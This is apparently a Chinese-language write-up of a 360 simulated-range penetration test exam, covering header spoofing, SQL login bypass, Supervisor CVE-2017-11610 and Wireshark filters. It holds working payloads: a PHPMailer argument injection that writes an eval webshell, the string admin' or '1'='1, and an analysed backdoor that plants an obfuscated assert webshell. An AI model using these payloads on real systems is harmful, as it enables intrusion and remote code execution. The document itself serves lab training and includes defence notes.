记一次360众测仿真实战靶场考核WP
字数 1467 2025-08-25 22:58:41
360众测仿真实战靶场考核技术解析
1. 微信User-Agent头伪造
技术要点:
- 伪造微信客户端的User-Agent头可以绕过某些针对微信环境的检测
- 典型微信User-Agent格式:
User-Agent: Mozilla/5.0 (iPhone; CPU iPhoneOS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G
实战应用:
- 使用Burp Suite等工具修改请求头
- 适用于需要伪装成微信客户端访问的场景
2. PHPMailer远程命令执行漏洞
漏洞原理:
- PHPMailer在处理邮件发送时存在参数注入漏洞
- 通过精心构造的email参数可实现任意文件写入
利用方法:
- 构造恶意email参数:
"xxx". -OQueueDirectory=/tmp/. -X/var/www/html/xxxx.php @xxx.com
- 在message参数中写入PHP代码:
<?php @eval($_GET[a]);?>
- 访问生成的webshell文件执行任意代码
防御措施:
- 升级至最新版PHPMailer
- 对用户输入进行严格过滤
3. 登录框SQL盲注
技术要点:
- 传统时间盲注效率低下
- 万能密码可快速绕过登录验证
实战经验:
- 优先尝试万能密码如:
admin' or '1'='1 - 避免耗时的时间盲注方法
- 注意密码字段可能存在的特殊处理(如MD5加密)
4. Supervisor远程命令执行漏洞(CVE-2017-11610)
漏洞信息:
- 影响Supervisor的XML-RPC接口
- 允许未经认证的远程代码执行
利用方法:
- 使用公开EXP直接利用
- 参考链接:https://blog.51cto.com/eth10/1955450
防御措施:
- 升级Supervisor至安全版本
- 限制XML-RPC接口访问
5. Referer来源伪造
技术要点:
- 通过修改HTTP Referer头伪造请求来源
- 常用于绕过CSRF防护或来源检查
实战应用:
- 使用Burp Suite修改Referer头
- 匹配目标系统要求的特定Referer值
6. 简单代码审计与利用
漏洞代码分析:
<?php
if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87') {
$_=@fopen('t.php', 'a');
@fwrite($_,"<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2]));
@\$_(\$_POST[1]);?>");
@fclose($_);
}
?>
利用步骤:
- 访问URL带参数:
?1=GET.fPZ87生成t.php - 访问t.php时构造参数:
?2=ilovey - POST提交PHP代码:
1=php代码
技术原理:
- 通过双重str_replace将"ilovey"转换为"assert"
- 最终形成可执行代码:
assert($_POST[1])
7. PHPCMS v9.1.x漏洞
注意事项:
- 前台可能存在漏洞利用点
- 后台登录可能依赖二维码验证
- 需进一步研究前台RCE或其他漏洞
8. 加解密程序分析
技术短板:
- 需要反编译技能分析EXE文件
- 涉及加密算法逆向分析
- 建议学习工具:IDA Pro、Ghidra等
9-10. Wireshark数据包分析技巧
高效分析方法:
- 搜索关键字符串如"php"定位可疑文件上传
- 分析上传后的恶意行为
- 定位攻击者IP:
- 筛选POST请求
- 从第一个POST请求开始追踪
- 使用过滤器:
php || post || html
实用过滤技巧:
http.request.method == "POST"frame contains "php"ip.src == x.x.x.x
总结与经验
- 灵活应变:避免陷入耗时的方法(如时间盲注),寻找更高效方案
- 知识广度:熟悉常见漏洞利用方式(如PHPMailer、Supervisor)
- 工具熟练:掌握Burp Suite、Wireshark等工具的高级用法
- 心态管理:保持冷静,遇到困难时尝试不同思路
- 持续学习:弥补技术短板(如反编译技能)
建议学习路径:
- 掌握常见Web漏洞原理
- 熟练使用安全测试工具
- 学习代码审计基础
- 了解二进制逆向基础
- 参与更多实战靶场练习